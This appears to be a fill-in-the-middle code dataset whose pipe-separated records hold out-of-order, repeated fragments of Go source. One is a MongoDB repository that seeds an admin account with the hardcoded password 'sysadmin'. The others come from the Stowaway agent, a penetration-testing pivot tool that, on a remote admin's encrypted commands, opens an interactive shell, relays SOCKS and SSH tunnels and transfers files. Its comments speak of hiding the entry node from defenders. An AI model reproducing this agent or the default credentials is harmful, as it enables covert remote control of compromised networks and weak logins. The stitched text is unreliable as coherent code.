Keys: bson.D{{"uuid", 1}}, // small probability for non-unique entry, just to be on safe side
Options: options.Index().SetUnique(true),
},
}
// private
// if err returned from mongo write operation contains duplicate entry
// e.g. breaking unique index
// returns true/false and the "{...}" part of original error message if true
func containsWriteErrDupEntry(err error) (bool, string) {
containsDup := false
var errMsg string
if v, ok := err.(mongo.WriteException); ok {
var msgs []string
for idx, werr:=range v.WriteErrors {
//log stuff before anything gets altered
fmt.Println("err.WriteErrors[",idx,"].Index=",werr.Index)
fmt.Println("err.WriteErrors[",idx,"].Code=",werr.Code)
fmt.Println("err.WriteErrors[",idx,"].Message=",werr.Message)
// err code 11000 or 11001 in MongoDB indicates duplicate key
if werr.Code == 11000 || werr.Code == 11001 {
containsDup = true
// get the dup key msg
pat := regexp.MustCompile(`({)(.*?)(})`)
msgs = append(msgs,pat.FindString(werr.Message))
}
}
fmt.Println("-- ",msgs)
//errMsg = c.Lines2JSONString(&msgs)
errMsg = strings.Join(msgs,",")
fmt.Println("--1 ",errMsg)
}
fmt.Println("--2 ",errMsg)
return containsDup,errMsg
} | { log.Fatal(err) } | conditional_block |
mongodb.go | package repository
import (
//"gopkg.in/mgo.v2/bson"
//"gopkg.in/mgo.v2"
c "github.com/MichalRybinski/Trion/common"
m "github.com/MichalRybinski/Trion/common/models"
"fmt"
//"encoding/json"
"context"
"log"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/bson/primitive"
"go.mongodb.org/mongo-driver/mongo"
"go.mongodb.org/mongo-driver/mongo/options"
"golang.org/x/crypto/bcrypt"
"time"
"regexp"
"strings"
//"github.com/fatih/structs"
)
type mongoDBHandler struct {
MongoClientOptions *options.ClientOptions
MongoClient *mongo.Client
MongoSystemDB *mongo.Database
MongoProjectsDB *mongo.Collection
}
var MongoDBHandler mongoDBHandler
func (mh *mongoDBHandler) MongoDBInit(appConfig *c.AppConfig) {
mh.MongoSystemDB = mh.MongoClient.Database(c.SysDBName)
//for mongodb DB & collection will be created with first insert to collection
mh.MongoProjectsDB = mh.MongoSystemDB.Collection(appConfig.DBConfig.MongoConfig.ProjectsColl)
users, err := mh.initSystemUsers()
fmt.Println("== init, users: ",users)
//check if system project "trion" already exists before inserting anything
itemsMap, err := mh.GetDocs(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name":"trion"})
if err != nil {
if _, ok := err.(c.NotFoundError); !ok { log.Fatal(err) }
fmt.Println("To był not found, len(itemsMap)",len(itemsMap))
}
now := time.Now()
if len(itemsMap) == 0 {
fmt.Println("Inserting Trion...")
mh.InsertOne(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name" : "trion",
"type" : "system",
"schema_rev": "1",
"owner":users[0]["_id"].(string),
"createdAt" : now,
"updatedAt" : now,
})
}
initSysIndexes(mh.MongoProjectsDB,sysProjIndexModels)
initSysIndexes(mh.MongoProjectsDB,userIndexModels)
initSysIndexes(mh.MongoClient.Database(c.UsersDBName).Collection(c.UsersDBAuthCollection),authIndexModels)
}
func (mh *mongoDBHandler) i | ) ([]map[string]interface{}, error) {
var err error
var sysAdmin m.UserDBModel
var now time.Time
var hashedPassword []byte
// check if default system admin exists
itemsMap, err := mh.GetDocs(c.UsersDBName, c.UsersDBUsersCollection, bson.M{"login":"sysadmin"})
if err !=nil {
if _, ok := err.(c.NotFoundError); !ok { goto Done }
}
if len(itemsMap) == 0 {
//insert default admin user
hashedPassword, err = bcrypt.GenerateFromPassword([]byte("sysadmin"), 12)
if err != nil {goto Done}
now = time.Now()
sysAdmin = m.UserDBModel{
Login: "sysadmin",
Hash: string(hashedPassword),
CreatedAt: now,
UpdatedAt: now,
}
if itemsMap, err = mh.InsertOne(c.UsersDBName, c.UsersDBUsersCollection, sysAdmin); err != nil { goto Done }
}
Done:
return itemsMap, err
}
func ConvertStringIDToObjID(stringID string) (primitive.ObjectID, error) {
oid, err := primitive.ObjectIDFromHex(stringID)
if err != nil { err = c.InvalidIdError{stringID} } //Maybe wrap original error?
return oid, err
}
// returns slice of acquired docs or error
func (mh *mongoDBHandler) GetDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("=> GetDocs, filter: %v", filter)
var err error
var itemsMap []map[string]interface{}
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter = c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { /* log */ goto Done }
}
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil {
//log
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) InsertOne(dbname string,
collectionname string,
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var insDoc = map[string]interface{}{}
insDoc = c.ConvertInterfaceToMapStringInterface(doc)
// check if "_id" is part of request, convert accordingly
if _, ok := insDoc["_id"]; ok {
insDoc["_id"], err = ConvertStringIDToObjID(insDoc["_id"].(string))
if err != nil { /* log */ return itemsMap, err }
}
var res *mongo.InsertOneResult
if err == nil {
now := time.Now()
insDoc["createdAt"] = now
insDoc["updatedAt"] = now
// insDoc["owner"] = now
res, err = collection.InsertOne(context.TODO(), insDoc)
if err == nil {
fmt.Printf("inserted document with ID %v\n", res.InsertedID.(primitive.ObjectID).Hex())
itemsMap, err = mh.getDocs(dbname,collectionname,bson.M{"_id":res.InsertedID})
fmt.Println("Inserted doc: ",itemsMap)
} else {
//v, _ := err.(type)
hasDupEntry, msgToPass := containsWriteErrDupEntry(err)
if hasDupEntry { err = c.ItemAlreadyExistsError{msgToPass} }
}
}
fmt.Printf("InsertOne: ItemsMap: %s\n InsertOne: err: %s\n",itemsMap,err)
return itemsMap, err
}
func (mh *mongoDBHandler) getDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("== getDocs")
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var result bson.M
var results []bson.M
var itemsMap []map[string]interface{}
fmt.Println("=== filter: ",filter)
cursor, err := collection.Find(context.TODO(),filter)
if err != nil {
goto Done
}
if err = cursor.All(context.TODO(), &results); err != nil {
goto Done
}
if len(results) <= 0 {
fmt.Println("No doc found")
} else {
fmt.Println("Doc(s) found:")
for _, result = range results {
var itemMap map[string]interface{}
b, _ := bson.Marshal(result)
bson.Unmarshal(b, &itemMap)
itemMap["_id"] = itemMap["_id"].(primitive.ObjectID).Hex()
fmt.Printf("itemMap after id: %v\n",itemMap)
itemsMap = append(itemsMap, itemMap)
}
}
Done:
fmt.Printf("itemsMap: %v\n",itemsMap)
for k, v := range itemsMap {
fmt.Println("itemsMap[",k,"]=",v)
}
fmt.Println("== /getDocs")
return itemsMap, err
}
func (mh *mongoDBHandler) DeleteDoc(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.DeleteResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { goto Done }
}
// grab doc to be deleted, so it can be provided in response for reference
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil { goto Done }
fmt.Println("== DeleteDoc, doc to be deleted: ", itemsMap)
res, err = collection.DeleteOne(context.TODO(), parsedFilter)
fmt.Printf("== DeleteDoc, deleted %v documents\n", res.DeletedCount)
if res.DeletedCount == 0 {
err = c.NotFoundError{ fmt.Sprintf( "not found: %s", parsedFilter) }
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) UpdateDoc(dbname string,
collectionname string,
filter interface{},
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.UpdateResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { return nil, err }
}
// parse doc into proper MongoDB update specification
// basically: { "$set" : {doc}}
var updateDoc = map[string]interface{}{}
updateDoc["$set"]=doc
updateDoc["$set"].(map[string]interface{})["updatedAt"]=time.Now()
res, err = collection.UpdateOne(context.TODO(), parsedFilter, updateDoc)
if err != nil {
goto Done
}
if res.MatchedCount != 0 {
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
fmt.Printf("Updated existing document %v\n for filter %v\n", itemsMap, parsedFilter)
} else {
err = c.NotFoundError{ fmt.Sprintf( "not found _id : %s", parsedFilter["_id"].(primitive.ObjectID).Hex() ) }
fmt.Printf("No document updated for filter %v\n", parsedFilter)
}
Done:
return itemsMap, err
}
func listExistingIndexes(coll *mongo.Collection){
//var indexView *mongo.IndexView
indexView := coll.Indexes()
// Specify the MaxTime option to limit the amount of time the operation can run on the server
opts := options.ListIndexes().SetMaxTime(2 * time.Second)
cursor, err := indexView.List(context.TODO(), opts)
if err != nil {
log.Fatal(err)
}
// Get a slice of all indexes returned and print them out.
var results []bson.M
if err = cursor.All(context.TODO(), &results); err != nil {
log.Fatal(err)
}
fmt.Println(results)
}
func initSysIndexes(coll *mongo.Collection, iModel []mongo.IndexModel) {
indexName, err := coll.Indexes().CreateMany(
context.Background(),
iModel,
)
fmt.Println("indexName: ",indexName, " err: ",err)
}
var sysProjIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1},{"owner", 1}},
},
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var userIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var authIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"uuid", 1}}, // small probability for non-unique entry, just to be on safe side
Options: options.Index().SetUnique(true),
},
}
// private
// if err returned from mongo write operation contains duplicate entry
// e.g. breaking unique index
// returns true/false and the "{...}" part of original error message if true
func containsWriteErrDupEntry(err error) (bool, string) {
containsDup := false
var errMsg string
if v, ok := err.(mongo.WriteException); ok {
var msgs []string
for idx, werr:=range v.WriteErrors {
//log stuff before anything gets altered
fmt.Println("err.WriteErrors[",idx,"].Index=",werr.Index)
fmt.Println("err.WriteErrors[",idx,"].Code=",werr.Code)
fmt.Println("err.WriteErrors[",idx,"].Message=",werr.Message)
// err code 11000 or 11001 in MongoDB indicates duplicate key
if werr.Code == 11000 || werr.Code == 11001 {
containsDup = true
// get the dup key msg
pat := regexp.MustCompile(`({)(.*?)(})`)
msgs = append(msgs,pat.FindString(werr.Message))
}
}
fmt.Println("-- ",msgs)
//errMsg = c.Lines2JSONString(&msgs)
errMsg = strings.Join(msgs,",")
fmt.Println("--1 ",errMsg)
}
fmt.Println("--2 ",errMsg)
return containsDup,errMsg
} | nitSystemUsers( | identifier_name |
startnode.go | package agent
import (
"fmt"
"io"
"net"
"os"
"strconv"
"strings"
"Stowaway/node"
"Stowaway/share"
"Stowaway/utils"
)
//startnode启动代码
//todo:可以为startnode加入一个保护机制,在startnode启动时可以设置是否开启此机制
//即当有节点异常断线时,可设置是否让startnode暂时断开与第二级节点的连接
//防止异常断线是由于管理员发现节点引起的,并根据connection进行逐点反查从而顺藤摸瓜找到入口点startnode,使得渗透测试者失去内网的入口点
//先暂时不加入,权当一个胡思乱想的idea,今后可视情况增加对startnode保护机制的处理代码,使得入口点更加稳固和隐蔽
func HandleStartNodeConn(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, NODEID string) {
go HandleConnFromAdmin(connToAdmin, monitor, listenPort, reConn, passive, NODEID)
go HandleConnToAdmin(connToAdmin)
}
//管理startnode发往admin的数据
func HandleConnToAdmin(connToAdmin *net.Conn) {
for {
proxyData := <-ProxyChan.ProxyChanToUpperNode
_, err := (*connToAdmin).Write(proxyData)
if err != nil {
continue
}
| ODEID string) {
var (
CannotRead = make(chan bool, 1)
GetName = make(chan bool, 1)
stdin io.Writer
stdout io.Reader
)
for {
AdminData, err := utils.ExtractPayload(*connToAdmin, AgentStatus.AESKey, NODEID, false)
if err != nil {
AdminOffline(reConn, monitor, listenPort, passive)
go SendInfo(NODEID) //重连后发送自身信息
go SendNote(NODEID) //重连后发送admin设置的备忘
continue
}
if AdminData.NodeId == NODEID {
switch AdminData.Type {
case "DATA":
switch AdminData.Command {
case "SOCKSDATA":
SocksDataChanMap.RLock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.RUnlock()
} else {
SocksDataChanMap.RUnlock()
SocksDataChanMap.Lock()
SocksDataChanMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HanleClientSocksConn(SocksDataChanMap.Payload[AdminData.Clientid], SocksInfo.SocksUsername, SocksInfo.SocksPass, AdminData.Clientid, NODEID)
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.Unlock()
}
case "FILEDATA": //接收文件内容
slicenum, _ := strconv.Atoi(AdminData.FileSliceNum)
FileDataMap.Lock()
FileDataMap.Payload[slicenum] = AdminData.Info
FileDataMap.Unlock()
case "FORWARD":
TryForward(AdminData.Info, AdminData.Clientid)
case "FORWARDDATA":
ForwardConnMap.RLock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
} else {
PortFowardMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HandleForward(PortFowardMap.Payload[AdminData.Clientid], AdminData.Clientid)
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
}
PortFowardMap.Unlock()
}
ForwardConnMap.RUnlock()
case "FORWARDFIN":
ForwardConnMap.Lock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
ForwardConnMap.Payload[AdminData.Clientid].Close()
delete(ForwardConnMap.Payload, AdminData.Clientid)
}
ForwardConnMap.Unlock()
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
close(PortFowardMap.Payload[AdminData.Clientid])
}
delete(PortFowardMap.Payload, AdminData.Clientid)
}
}
PortFowardMap.Unlock()
case "REFLECTDATARESP":
ReflectConnMap.Lock()
ReflectConnMap.Payload[AdminData.Clientid].Write([]byte(AdminData.Info))
ReflectConnMap.Unlock()
case "REFLECTTIMEOUT":
fallthrough
case "REFLECTOFFLINE":
ReflectConnMap.Lock()
if _, ok := ReflectConnMap.Payload[AdminData.Clientid]; ok {
ReflectConnMap.Payload[AdminData.Clientid].Close()
delete(ReflectConnMap.Payload, AdminData.Clientid)
}
ReflectConnMap.Unlock()
case "FINOK":
SocksDataChanMap.Lock() //性能损失?
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
SocksDataChanMap.Unlock()
case "FIN":
CurrentConn.Lock()
if _, ok := CurrentConn.Payload[AdminData.Clientid]; ok {
CurrentConn.Payload[AdminData.Clientid].Close()
delete(CurrentConn.Payload, AdminData.Clientid)
}
CurrentConn.Unlock()
SocksDataChanMap.Lock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
SocksDataChanMap.Unlock()
case "HEARTBEAT":
hbdatapack, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "KEEPALIVE", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- hbdatapack
default:
continue
}
case "COMMAND":
switch AdminData.Command {
case "SHELL":
switch AdminData.Info {
case "":
stdout, stdin = CreatInteractiveShell()
go func() {
StartShell("", stdin, stdout, NODEID)
}()
case "exit\n":
fallthrough
default:
go func() {
StartShell(AdminData.Info, stdin, stdout, NODEID)
}()
}
case "SOCKS":
socksinfo := strings.Split(AdminData.Info, ":::")
SocksInfo.SocksUsername = socksinfo[1]
SocksInfo.SocksPass = socksinfo[2]
StartSocks()
case "SOCKSOFF":
case "SSH":
err := StartSSH(AdminData.Info, NODEID)
if err == nil {
go ReadCommand()
} else {
break
}
case "SSHCOMMAND":
go WriteCommand(AdminData.Info)
case "SSHTUNNEL":
err := SSHTunnelNextNode(AdminData.Info, NODEID)
if err != nil {
fmt.Println("[*]", err)
break
}
case "CONNECT":
var status bool = false
command := strings.Split(AdminData.Info, ":::")
addr := command[0]
choice := command[1]
if choice == "1" { //连接的节点是否是在reuseport?
status = node.ConnectNextNodeReuse(addr, NODEID, AgentStatus.AESKey)
} else {
status = node.ConnectNextNode(addr, NODEID, AgentStatus.AESKey)
}
if !status {
message, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NODECONNECTFAIL", " ", "", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- message
}
case "FILENAME":
var err error
UploadFile, err := os.Create(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "CREATEFAIL", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NAMECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go share.ReceiveFile("", connToAdmin, FileDataMap, CannotRead, UploadFile, AgentStatus.AESKey, false, NODEID)
}
case "FILESIZE":
filesize, _ := strconv.ParseInt(AdminData.Info, 10, 64)
share.File.FileSize = filesize
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESIZECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSize <- true
case "FILESLICENUM":
share.File.TotalSilceNum, _ = strconv.Atoi(AdminData.Info)
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESLICENUMCONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSliceNum <- true
case "FILESLICENUMCONFIRM":
share.File.TotalConfirm <- true
case "FILESIZECONFIRM":
share.File.TotalConfirm <- true
case "DOWNLOADFILE":
go share.UploadFile("", AdminData.Info, connToAdmin, utils.AdminId, GetName, AgentStatus.AESKey, NODEID, false)
case "NAMECONFIRM":
GetName <- true
case "CREATEFAIL":
GetName <- false
case "CANNOTREAD":
CannotRead <- true
share.File.ReceiveFileSliceNum <- false
os.Remove(AdminData.Info) //删除空文件
case "FORWARDTEST":
go TestForward(AdminData.Info)
case "REFLECTTEST":
go TestReflect(AdminData.Info)
case "REFLECTNUM":
ReflectStatus.ReflectNum <- AdminData.Clientid
case "STOPREFLECT":
ReflectConnMap.Lock()
for key, conn := range ReflectConnMap.Payload {
conn.Close()
delete(ForwardConnMap.Payload, key)
}
ReflectConnMap.Unlock()
for _, listener := range CurrentPortReflectListener {
listener.Close()
}
case "LISTEN":
err := TestListen(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "FAILED", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "LISTENRESP", " ", "SUCCESS", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go node.StartNodeListen(AdminData.Info, NODEID, AgentStatus.AESKey)
}
case "YOURINFO": //接收note
AgentStatus.NodeNote = AdminData.Info
case "KEEPALIVE":
default:
continue
}
}
} else {
// 检查是否是admin发来的,分配给自己子节点的ID命令,是的话将admin分配的序号记录
if AdminData.Route == "" && AdminData.Command == "ID" {
AgentStatus.WaitForIDAllocate <- AdminData.NodeId //将此节点序号递交,以便启动HandleConnFromLowerNode函数
node.NodeInfo.LowerNode.Lock()
node.NodeInfo.LowerNode.Payload[AdminData.NodeId] = node.NodeInfo.LowerNode.Payload[utils.AdminId]
node.NodeInfo.LowerNode.Unlock()
}
routeid := ChangeRoute(AdminData) //更改路由并返回下一个路由点
proxyData, _ := utils.ConstructPayload(AdminData.NodeId, AdminData.Route, AdminData.Type, AdminData.Command, AdminData.FileSliceNum, AdminData.Info, AdminData.Clientid, AdminData.CurrentId, AgentStatus.AESKey, true)
passToLowerData := utils.NewPassToLowerNodeData()
if routeid == "" { //当返回的路由点为0,说明就是自己的子节点
passToLowerData.Route = AdminData.NodeId
} else { //不是0,说明不是自己的子节点,还需要一定轮数的递送
passToLowerData.Route = routeid
}
passToLowerData.Data = proxyData //封装结构体,交给HandleConnToLowerNode处理
ProxyChan.ProxyChanToLowerNode <- passToLowerData
}
}
}
| }
}
//管理admin端下发的数据
func HandleConnFromAdmin(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, N | identifier_body |
startnode.go | package agent
import (
"fmt"
"io"
"net"
"os"
"strconv"
"strings"
"Stowaway/node"
"Stowaway/share"
"Stowaway/utils"
)
//startnode启动代码
//todo:可以为startnode加入一个保护机制,在startnode启动时可以设置是否开启此机制
//即当有节点异常断线时,可设置是否让startnode暂时断开与第二级节点的连接
//防止异常断线是由于管理员发现节点引起的,并根据connection进行逐点反查从而顺藤摸瓜找到入口点startnode,使得渗透测试者失去内网的入口点
//先暂时不加入,权当一个胡思乱想的idea,今后可视情况增加对startnode保护机制的处理代码,使得入口点更加稳固和隐蔽
func HandleStartNodeConn(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, NODEID string) {
go HandleConnFromAdmin(connToAdmin, monitor, listenPort, reConn, passive, NODEID)
go HandleConnToAdmin(connToAdmin)
}
//管理startnode发往admin的数据
func HandleConnToAdmin(connToAdmin *net.Conn) {
for {
proxyData := <-ProxyChan.ProxyChanToUpperNode
_, err := (*connToAdmin).Write(proxyData)
if err != nil {
continue
}
}
}
//管理admin端下发的数据
func HandleConnFromAdmin(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, NODEID string) {
var (
CannotRead = make(chan bool, 1)
GetName = make(chan bool, 1)
stdin io.Writer
stdout io.Reader
)
for {
AdminData, err := utils.ExtractPayload(*connToAdmin, AgentStatus.AESKey, NODEID, false)
if err != nil {
AdminOffline(reConn, monitor, listenPort, passive)
go SendInfo(NODEID) //重连后发送自身信息
go SendNote(NODEID) //重连后发送admin设置的备忘
continue
}
if AdminData.NodeId == NODEID {
switch AdminData.Type {
case "DATA":
switch AdminData.Command {
case "SOCKSDATA":
SocksDataChanMap.RLock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.RUnlock()
} else {
SocksDataChanMap.RUnlock()
SocksDataChanMap.Lock()
SocksDataChanMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HanleClientSocksConn(SocksDataChanMap.Payload[AdminData.Clientid], SocksInfo.SocksUsername, SocksInfo.SocksPass, AdminData.Clientid, NODEID)
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.Unlock()
}
case "FILEDATA": //接收文件内容
slicenum, _ := strconv.Atoi(AdminData.FileSliceNum)
FileDataMap.Lock()
FileDataMap.Payload[slicenum] = AdminData.Info
FileDataMap.Unlock()
case "FORWARD":
TryForward(AdminData.Info, AdminData.Clientid)
case "FORWARDDATA":
ForwardConnMap.RLock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
} else {
PortFowardMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HandleForward(PortFowardMap.Payload[AdminData.Clientid], AdminData.Clientid)
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
}
PortFowardMap.Unlock()
}
ForwardConnMap.RUnlock()
case "FORWARDFIN":
ForwardConnMap.Lock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
ForwardConnMap.Payload[AdminData.Clientid].Close()
delete(ForwardConnMap.Payload, AdminData.Clientid)
}
ForwardConnMap.Unlock()
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
close(PortFowardMap.Payload[AdminData.Clientid])
}
delete(PortFowardMap.Payload, AdminData.Clientid)
}
}
PortFowardMap.Unlock()
case "REFLECTDATARESP":
ReflectConnMap.Lock()
ReflectConnMap.Payload[AdminData.Clientid].Write([]byte(AdminData.Info))
ReflectConnMap.Unlock()
case "REFLECTTIMEOUT":
fallthrough
case "REFLECTOFFLINE":
ReflectConnMap.Lock()
if _, ok := ReflectConnMap.Payload[AdminData.Clientid]; ok {
ReflectConnMap.Payload[AdminData.Clientid].Close()
delete(ReflectConnMap.Payload, AdminData.Clientid)
}
ReflectConnMap.Unlock()
case "FINOK":
SocksDataChanMap.Lock() //性能损失?
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
SocksDataChanMap.Unlock()
case "FIN":
CurrentConn.Lock()
if _, ok := CurrentConn.Payload[AdminData.Clientid]; ok {
CurrentConn.Payload[AdminData.Clientid].Close()
delete(CurrentConn.Payload, AdminData.Clientid)
}
CurrentConn.Unlock()
SocksDataChanMap.Lock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
SocksDataChanMap.Unlock()
case "HEARTBEAT":
hbdatapack, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "KEEPALIVE", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- hbdatapack
default:
continue
}
case "COMMAND":
switch AdminData.Command {
case "SHELL":
switch AdminData.Info {
case "":
stdout, stdin = CreatInteractiveShell()
go func() {
StartShell("", stdin, stdout, NODEID)
}()
case "exit\n":
fallthrough
default:
go func() {
StartShell(AdminData.Info, stdin, stdout, NODEID)
}()
}
case "SOCKS":
socksinfo := strings.Split(AdminData.Info, ":::")
SocksInfo.SocksUsername = socksinfo[1]
SocksInfo.SocksPass = socksinfo[2]
StartSocks()
case "SOCKSOFF":
case "SSH":
err := StartSSH(AdminData.Info, NODEID)
if err == nil {
go ReadCommand()
} else {
break
}
case "SSHCOMMAND":
go WriteCommand(AdminData.Info)
case "SSHTUNNEL":
err := SSHTunnelNextNode(AdminData.Info, NODEID)
if err != nil {
fmt.Println("[*]", err)
break
}
case "CONNECT":
var status bool = false
command := strings.Split(AdminData.Info, ":::")
addr := command[0]
choice := command[1]
if choice == "1" { //连接的节点是否是在reuseport?
status = node.ConnectNextNodeReuse(addr, NODEID, AgentStatus.AESKey)
} else {
status = node.ConnectNextNode(addr, NODEID, AgentStatus.AESKey)
}
if !status {
message, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NODECONNECTFAIL", " ", "", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- message
}
case "FILENAME":
var err error
UploadFile, err := os.Create(AdminData.Info)
if err != nil {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "CREATEFAIL", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
} else {
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "NAMECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
go share.ReceiveFile("", connToAdmin, FileDataMap, CannotRead, UploadFile, AgentStatus.AESKey, false, NODEID)
}
case "FILESIZE":
filesize, _ := strconv.ParseInt(AdminData.Info, 10, 64)
share.File.FileSize = filesize
respComm, _ := utils.ConstructPayload(utils.AdminId, "", "COMMAND", "FILESIZECONFIRM", " ", " ", 0, NODEID, AgentStatus.AESKey, false)
ProxyChan.ProxyChanToUpperNode <- respComm
share.File.ReceiveFileSize <- true
case "FILESLICENUM":
share.File.TotalSilceNum, _ = strconv.Atoi(AdminData.Info)
